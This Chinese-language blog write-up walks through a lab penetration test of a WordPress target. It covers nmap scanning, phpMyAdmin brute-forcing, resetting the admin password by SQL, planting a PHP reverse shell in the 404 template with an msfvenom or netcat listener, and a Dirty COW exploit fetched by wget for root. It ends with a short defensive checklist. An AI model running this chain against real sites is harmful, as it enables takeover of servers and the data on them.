WordPress简介
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统( CMS )来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。
第一步,信息收集
(1)主机发现:arp-scan -l 查看同一局域网下的主机
主机发现也采用 arp-scan、netdiscover、fping等工具
(2)端口扫描:使用namp对发现的主机IP进行扫描
命令:nmap -sS -SV -p- -v -T4 靶机IP
(3)dirb目录遍历
目录扫描工具还有:dirb、dirbuster、gobuster、御剑
寻找敏感文件//
例如找到了phpmyadmin的mysql数据库登陆页面,以及wp-admin管理员登陆页面
进入mysql数据库:
方法一:使用弱口令登陆,默认下未修改的账号/密码可尝试登陆:root
方法二:使用phpmyadmin多线程批量破解工具进行爆破
在成功破解到密码后,我们发现可以修改。或者添加用户。我们为登陆的用户进行修改 ps:因为密码经过了MD5等格式的加密,不容易破解,我们为了方便可以进行修改密码
为了方便wp-admin管理员页面顺利登陆我们可以修改密码
例如:我们将密码重新设置为‘123456’:
update wp-users set user_pass=md5("123456") where user_login= 'cleverbao';
因为靶场问题:些许靶机部分数据段字段,例如wp的ip地址需要进行修改,才能完成此实验
将后面改成自己kali的地址
在一系列的操作完成后,我们就可以正常的去登陆后逃跑://靶机ip/wp-admin,输入账号密码。进入后台
第二步,权限提升
生成shell
方法一:利用MSF生成反弹shell:msfvenom -p php/meterpreter/reverse_tcp(生成一个webshell的类型) LHOST=Kali的IP LPORT=4444(监听端口) -o Desktop/shell.php
一旦网站执行了上传的马,我们将有控制网站的权利
方法二:
利用kali Linux自带的反弹shell
终端输入:cat /usr/share/webshells/php/php-reverse-shell.php查找木马代码
复制此shell代码到404模版,修改IP为kali地址,端口为4444
点击外观,选择里面的编辑,选择404模版,将代码复制到404模版插入反弹shell
获取shell
使用netcat,类似于中国菜刀,监听4444端口:nc -nlvp 4444
浏览器访问不存在的页面,触发404文件执行,例如http://靶机ip/?p=666
使用命令whoami,查看当前权限
如果当前权限不是root权限需要进行提权
注:$代表一般用户权限,#代表root权限
使用命令:uname -a // 可以查看当前系统的内核
权限提升-漏洞概述
漏洞原理
Linux内核的内存子系统在处理写入时复制(copy-on-write,COW)时产生了竞争条件(race condition )。恶意用户可利用此漏洞,来获取高杠限,对只读内存映射进行写访问
竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限.
下载漏洞到kali,发现代码是使用c语言编写的,我们到kali里面就需要用到gcc工具去编译
下载到kali桌面并进入目录,
使用gcc编译:gcc -pthread dirty.c(文件) -o(输出) dirt(生成该工具文件) -lcrypt
我们需要该文件工具具有执行的权限:ls -l dirt chmod +x dirty
使用python开启http服务器
python -m SimpleHTTPServer 80
靶场那边则需要通过反弹的shell,进入靶机/tmp目录,使用wget下载dirty文件
命令为:wget http://kali的IP/dirty
执行dirty完成提权,获得登陆信息
命令:./dirty new_password(任意密码)
3.3 思路总结 - 渗透全过程(红队 )
主机发现,扫描和识别端口服务,找到22、80、3306
目录扫描,找到敏感目录,包括数据库和网站后台
手工尝试登录数据库后台,修改网站账号密码
利用网站账号登录网站后台,上传网站木马( shell )
执行网站木马获取低权限shell,判断系统版本寻找提权方法
使用Dirty Cow 漏洞提权,获取管理员账号实现Root 权限
3.3 思路总结 - 防御全过程(蓝队 )
关闭不需要的端口,遵循最小化原则
使用常见网站CMS时,修改默认后台路径
使用PhpmyAdmin时,修改默认路径和密码
升级操作系统版本,不定时打补丁修复漏洞
关注最新漏洞情报,提升安全运维响应能力
3.3 思路总结-渗透工具汇总
主机扫描 : nmap、arp-scan、netdiscover
目录遍历 : dirb、dirbuster、gobuster、御剑
漏洞挖掘与利用: phpmyadmin、burp、msf、netcat
权限提升:dirty cow、gcc
带验证码的表单爆破工具:pkav
标签:shell,漏洞,--,kali,渗透,WordPress,dirty,网站,权限 From: https://www.cnblogs.com/aidy/p/17441635.html